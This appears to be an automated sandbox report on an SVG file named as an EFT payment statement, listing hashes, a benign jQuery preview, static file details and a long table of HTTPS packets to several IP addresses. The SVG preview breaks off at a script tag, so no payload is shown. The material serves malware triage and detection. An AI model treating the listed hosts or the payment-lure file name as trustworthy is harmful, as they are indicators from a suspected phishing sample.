SSDEEP:	1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://code.jquery.com/jquery-3.6.0.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Static File Info

General

File type:	data
Entropy (8bit):	3.6979602934055515
TrID:	Lumena CEL bitmap (63/63) 60.58% Corel Photo Paint (41/41) 39.42%
File name:	34209QB_EFT_Payment_Statemt25.svg
File size:	1'172 bytes
MD5:	83f71712cfc6b15893aa00b9c653aac4
SHA1:	4a2f80f14fd7c69d974f778a83b7a9b3a531c70b
SHA256:	19595d0dde03b7ba477a7788e5c4d268a2cefb43178232affbd4c52d3512ef16
SHA512:	7122adbd78be4f9a13b7915e760b87cb56bc3c6e734794fb1fbed3d6d73e28582c0d98e067044fb02d7e3f866807be2411ecd9ed30b317dd53fcfebacd40f405
SSDEEP:	12:F/LX4okR+I+3AYqcTJnyNHJcRLcTCevbqQWpaKG318qAn8WRXCa12jATOFskA8g7:lLnAYH4NyRgkE31DA8kqjA2XMyXe
TLSH:	4D21003F56DE021E75B1EB54C1F01083B965BF5B7518AD4C11EA0B0C80A2ED2B8D6B2F
File Content Preview:	<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.8.". .s.t.a.n.d.a.l.o.n.e.=.".n.o.".?.>.....<.s.v.g. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.0./.s.v.g.". .w.i.d.t.h.=.".4.0.0.". .h.e.i.g.h.t.=.".2.5.0.".>.....<.s.c.r.i

File Icon


Icon Hash:	173149cccc490307

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 271
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 25, 2025 15:50:52.920598030 CET	49671	443	192.168.2.4	204.79.197.203
Mar 25, 2025 15:50:57.155680895 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 15:50:57.467464924 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 15:50:57.733032942 CET	49671	443	192.168.2.4	204.79.197.203
Mar 25, 2025 15:50:58.076756954 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 15:50:59.280282974 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 15:51:01.686459064 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 15:51:04.189322948 CET	49725	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:51:04.189376116 CET	443	49725	142.251.32.100	192.168.2.4
Mar 25, 2025 15:51:04.189490080 CET	49725	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:51:04.189708948 CET	49725	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:51:04.189729929 CET	443	49725	142.251.32.100	192.168.2.4
Mar 25, 2025 15:51:04.401823997 CET	443	49725	142.251.32.100	192.168.2.4
Mar 25, 2025 15:51:04.401957035 CET	49725	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:51:04.405339956 CET	49725	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:51:04.405389071 CET	443	49725	142.251.32.100	192.168.2.4
Mar 25, 2025 15:51:04.405668974 CET	443	49725	142.251.32.100	192.168.2.4
Mar 25, 2025 15:51:04.451402903 CET	49725	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:51:05.192502022 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:05.192600012 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:05.192683935 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:05.193373919 CET	49728	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:05.193389893 CET	443	49728	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:05.193447113 CET	49728	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:05.193763018 CET	49728	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:05.193775892 CET	443	49728	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:05.193849087 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:05.193882942 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:05.419604063 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:05.419811964 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:05.421123981 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:05.421153069 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:05.421453953 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:05.421823978 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:05.424751997 CET	443	49728	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:05.424822092 CET	49728	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:05.426064014 CET	49728	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:05.426070929 CET	443	49728	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:05.426634073 CET	443	49728	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:05.464271069 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:05.477642059 CET	49728	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.158919096 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.158983946 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.159008980 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.159037113 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.159058094 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.159076929 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.159090996 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.159090996 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.159100056 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.159121990 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.159143925 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.159168005 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.159199953 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.159218073 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.159225941 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.159243107 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.159961939 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.159989119 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.160015106 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.160037994 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.160039902 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.160056114 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.160069942 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.160140038 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.160872936 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.160904884 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.160973072 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.160990953 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.161159992 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.161179066 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.161540985 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.161565065 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.161681890 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.161705017 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.161708117 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.161716938 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.161746979 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.161766052 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.161777973 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.161802053 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.162626982 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.162647009 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.162714958 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.162735939 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.162803888 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.162851095 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.162951946 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.163043976 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.163050890 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.163578987 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.163625956 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.163713932 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.163736105 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.163764000 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.163774967 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.163800001 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.163806915 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.164001942 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.164038897 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.164103031 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.164112091 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.165332079 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.165457964 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.165466070 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.165493965 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.165517092 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.165524006 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.165709019 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.263971090 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.264095068 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.264106989 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.264130116 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.264290094 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.264369965 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.264461040 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.264499903 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.264504910 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.264533043 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.265057087 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.265202045 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.265214920 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.265486002 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.265604019 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.265615940 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.266072989 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.266186953 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.266216993 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.266228914 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.266266108 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.267425060 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.267543077 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.267554998 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.267585039 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.267617941 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.267628908 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.267663002 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.268524885 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.268569946 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.268604994 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.268615961 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.268635035 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.268646002 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.270435095 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.270446062 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.312732935 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.334439993 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.334486008 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.334516048 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.334542036 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.334673882 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.334703922 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.334721088 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.339294910 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.370436907 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.370594978 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.370698929 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.370857000 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.372092009 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.372123003 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.372200966 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.372201920 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.372216940 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.372283936 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.372394085 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.372483015 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.372483969 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.372495890 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.372545958 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.372572899 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.374175072 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.374217987 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.374258041 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.374270916 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.374301910 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.374476910 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.374485016 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.374494076 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.374624014 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.374829054 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.374929905 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.374942064 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.376019001 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.376270056 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.376281023 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.376338005 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.376630068 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.376734972 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.376748085 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.376796961 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.377677917 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.377787113 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.377820015 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.377835989 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.377880096 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.377969027 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.378073931 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.378209114 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.379232883 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.379551888 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.379874945 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.380048990 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.380089998 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.380100965 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.380147934 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.381484985 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.381500959 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.381623030 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.381623030 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.381640911 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.382208109 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.382364035 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.382376909 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.382497072 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.384013891 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.384048939 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.384160042 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.384160042 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.384176016 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.385472059 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.385488033 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.385580063 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.385580063 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.385596991 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.387861967 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.387876034 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.388133049 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.388148069 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.388993025 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.417649031 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.417666912 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.418103933 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.418153048 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.439388037 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.439412117 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.441013098 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.442615986 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.445241928 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.445293903 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.445759058 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.447367907 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.447381973 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.447578907 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.447594881 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.480067968 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.480091095 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.480207920 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.480207920 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.480232000 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.481467009 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.481481075 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.481617928 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.481643915 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.482650995 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.483036041 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.483052015 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.483254910 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.492690086 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 15:51:06.524488926 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.524517059 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.524804115 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.524831057 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.524914026 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.526106119 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.526129007 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.526313066 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.526335955 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.526535988 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.528184891 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.528202057 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.528541088 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.528565884 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.528775930 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.530339003 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.530354977 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.530498028 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.530518055 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.530638933 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.536395073 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.536411047 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.536514044 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.536514044 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.536537886 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.536828041 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.536848068 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.536922932 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.536922932 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.536941051 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.537955046 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.537972927 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.538000107 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.538017988 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.538042068 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.538042068 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.538083076 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.540683031 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.540699005 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.540925026 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.540950060 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.541002035 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.543155909 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.543174982 CET	443	49727	104.21.65.232	192.168.2.4
